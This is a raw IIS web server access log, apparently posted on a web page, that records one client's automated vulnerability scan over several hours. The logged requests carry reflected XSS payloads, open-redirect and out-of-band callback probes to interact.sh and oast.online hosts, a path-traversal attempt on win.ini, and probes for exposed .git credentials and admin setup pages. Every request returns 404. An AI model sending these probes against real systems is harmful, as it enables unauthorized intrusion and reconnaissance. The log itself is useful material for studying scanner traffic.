2023-07-06 18:45:23 103.153.214.94 GET /sysadmin/phpMyAdmin/scripts/setup.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 30
2023-07-06 18:45:23 103.153.214.94 GET /phpmyadmin/setup/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 28
2023-07-06 18:45:23 103.153.214.94 GET /pma/setup/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 29
2023-07-06 18:45:23 103.153.214.94 GET /admin/pma/setup/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 29
2023-07-06 18:45:23 103.153.214.94 GET /phpmyadmin/setup/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 25
2023-07-06 18:45:23 103.153.214.94 GET /setup/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 28
2023-07-06 18:45:23 103.153.214.94 GET /admin/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 27
2023-07-06 18:49:50 103.153.214.94 GET / - 8172 - 167.248.133.38 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 404 7 0 235
2023-07-06 18:56:40 103.153.214.94 GET /creaprezzi.php prezzoperiodo4=%22&gt;&lt;script&gt;javascript:alert(%27XSS%27)&lt;/script&gt; 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 31
2023-07-06 18:56:40 103.153.214.94 GET /modifica_cliente.php idclienti=1&amp;tipo_tabella=%22&gt;&lt;script&gt;javascript:alert(%27XSS%27)&lt;/script&gt; 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 24
2023-07-06 18:56:40 103.153.214.94 GET /dati/availability_tpl.php num_app_tipo_richiesti1=%22&gt;&lt;script&gt;javascript:alert(%27XSS%27)&lt;/script&gt; 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 24
2023-07-06 18:59:44 103.153.214.94 GET /perl-status - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 32
2023-07-06 19:00:22 103.153.214.94 GET /dbconsole/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 26
2023-07-06 19:00:22 103.153.214.94 GET /h2-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 25
2023-07-06 19:12:54 103.153.214.94 GET /wp-content/plugins/e-search/tmpl/title_az.php title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 30
2023-07-06 19:16:29 103.153.214.94 GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 30
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 19:34:42
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 19:34:42 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 27
2023-07-06 19:36:15 103.153.214.94 GET /novius-os/admin/nos/login redirect=http://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 27
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 20:00:52
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 20:00:52 103.153.214.94 GET /login.html returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 30
2023-07-06 20:07:38 103.153.214.94 GET /api/index.php/v1/config/application public=true 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 33
2023-07-06 20:07:38 103.153.214.94 GET /api/v1/config/application public=true 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 26
2023-07-06 20:10:48 103.153.214.94 GET / phonepe_action=curltestPhonePe&amp;url=http://ciio7miofm2mtabc1uagcriymbpdtj469.oast.online 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 28
2023-07-06 20:20:04 103.153.214.94 GET / ct_baths_plus&amp;ct_beds_plus&amp;ct_brokerage=0&amp;ct_city&amp;ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&amp;ct_keyword&amp;ct_lotsize_from&amp;ct_lotsize_to&amp;ct_mls&amp;ct_mobile_keyword&amp;ct_price_from&amp;ct_price_to&amp;ct_sqft_from&amp;ct_sqft_to&amp;ct_year_from&amp;ct_year_to&amp;ct_zipcode&amp;lat&amp;lng&amp;search-listings=true 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 32
2023-07-06 20:23:11 103.153.214.94 GET /PolicyMgmt/policyDetailsCard.do poID=19&amp;prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E&amp;typeID=3 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 28
2023-07-06 20:35:32 103.153.214.94 GET /picturesPreview currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&amp;urls 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 29
2023-07-06 20:49:18 103.153.214.94 GET /.git-credentials - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 32
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 21:05:58
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 21:05:57 103.153.214.94 GET /static../.git/config - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 0 0 34
2023-07-06 21:05:57 103.153.214.94 GET /js../.git/config - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 0 29
2023-07-06 21:05:57 103.153.214.94 GET /images../.git/config - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 0 0 26
2023-07-06 21:05:58 103.153.214.94 GET /img../.git/config - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 0 0 26
2023-07-06 21:05:58 103.153.214.94 GET /css../.git/config - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 0 0 26
2023-07-06 21:05:58 103.153.214.94 GET /assets../.git/config - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 0 0 26
2023-07-06 21:05:58 103.153.214.94 GET /content../.git/config - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 0 0 30
2023-07-06 21:05:58 103.153.214.94 GET /events../.git/config - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 0 0 26
2023-07-06 21:05:58 103.153.214.94 GET /media../.git/config - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 0 0 31
2023-07-06 21:05:58 103.153.214.94 GET /lib../.git/config - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 0 0 28
2023-07-06 21:06:26 103.153.214.94 GET /help/english/index.html javascript:alert(document.domain) 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 26
2023-07-06 21:09:11 103.153.214.94 GET /index.php SQ=0&amp;btn_submit.x=0&amp;btn_submit.y=0&amp;srch=x&quot;+onmouseover%3Dalert%281%29+x%3D&quot;&amp;t=search 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 25
2023-07-06 21:19:55 103.153.214.94 GET / db=mysql&amp;server=db&amp;table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;username=root 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 26
2023-07-06 21:28:12 103.153.214.94 GET /otobo/index.pl Action=ExternalURLJump;URL=http://www.interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 29
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 21:58:22
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 21:58:21 103.153.214.94 GET /ads/www/delivery/lg.php dest=http://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27
2023-07-06 21:58:22 103.153.214.94 GET /adserve/www/delivery/lg.php dest=http://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 25
2023-07-06 21:58:22 103.153.214.94 GET /adserver/www/delivery/lg.php dest=http://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 27
2023-07-06 21:58:22 103.153.214.94 GET /openx/www/delivery/lg.php dest=http://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 26
2023-07-06 21:58:22 103.153.214.94 GET /revive/www/delivery/lg.php dest=http://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 23
2023-07-06 21:58:22 103.153.214.94 GET /www/delivery/lg.php dest=http://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 23
2023-07-06 21:58:41 103.153.214.94 GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 25
2023-07-06 22:00:37 103.153.214.94 GET /ie50/system/login/SysLoginUser.aspx Login=Denied&amp;UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 28
2023-07-06 22:00:37 103.153.214.94 GET /system/login/SysLoginUser.aspx Login=Denied&amp;UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 26
2023-07-06 22:04:25 103.153.214.94 GET /nagiosxi/login.php redirect=/www.interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 31
2023-07-06 22:15:13 103.153.214.94 GET /index.php _csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&amp;destination=zbuip%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl&amp;logMeIn=Login&amp;memberID=admin&amp;memberPassWord=password&amp;p=member 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 30
2023-07-06 22:21:55 103.153.214.94 GET / s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 26
2023-07-06 22:37:23 103.153.214.94 GET /wp-content/uploads/data.txt - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 34
2023-07-06 22:42:50 103.153.214.94 GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 29
2023-07-06 22:42:50 103.153.214.94 GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 26
2023-07-06 22:55:33 103.153.214.94 GET /index.php redirect=/\/interact.sh/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27
2023-07-06 22:55:33 103.153.214.94 GET /index.php redirect=//interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 21
2023-07-06 23:00:29 103.153.214.94 GET /sap/public/info - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 36
2023-07-06 23:02:19 103.153.214.94 GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 26
2023-07-06 23:13:10 103.153.214.94 GET /webadmin/authportal/bounce.php url=https://interact.sh/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 31
2023-07-06 23:17:00 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 25
2023-07-06 23:18:10 103.153.214.94 GET /xprober.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 33
2023-07-06 23:32:51 103.153.214.94 GET / appurl=aHR0cDovL2ludGVyYWN0LnNo&amp;wp_nlm=confirmation 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 24
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 23:48:19
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 23:48:19 103.153.214.94 GET /php/device_graph_page.php graph=%22zlo%20onerror=alert(1)%20%22 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 32
2023-07-06 23:53:20 103.153.214.94 GET /pacs/login.php message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 28
2023-07-06 23:57:32 103.153.214.94 GET /xmlpserver/servlet/adfresource documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini&amp;format=aaaaaaaaaaaaaaa 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 29
2023-07-06 23:59:11 103.153.214.94 GET /wp-admin/admin.php page=ultimate-maps-supsystic&amp;tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 31
</pre><center><hr width="920" color="black"/> <center>

</BODY>

</HTML>